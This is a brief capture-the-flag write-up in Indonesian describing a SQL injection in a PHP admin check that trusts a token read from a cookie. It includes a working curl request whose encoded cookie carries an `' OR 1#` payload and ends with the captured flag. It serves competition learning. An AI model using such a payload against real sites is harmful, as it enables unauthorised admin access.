Powered by GitBook

http://target.netsec.gemastik.ui.ac.id:60012/2443b2269e1fa1539d0cbf8270a095ab

POC

Validasi admin yang di lakukan menggunakan token yang diambil dari cookie dan divalidasi ke dalam database tanpa di filter mudah untuk di manipulasi sehingga kita bisa melakukan SQL Injection sehingga dapat membuat user yang tidak mempunyai validasi token bisa di anggap admin yang valid.

curl 'http://target.netsec.gemastik.ui.ac.id:60012/2443b2269e1fa1539d0cbf8270a095ab/index.php' -H 'Cookie: PHPSESSID=3ho6v7knktmi7mvh8akfg919v2; auth=%7B%22username%22%20%3A%20%22%60%22%2C%20%22admin%22%20%3A%201%2C%20%22token%22%20%3A%20%22xx%27+OR+1%23%22%7D' -H --compressed

Flag: GEMASTIK{belive_it_0r_n0t_this_is_based_on_real_case}

results matching ""

No results matching ""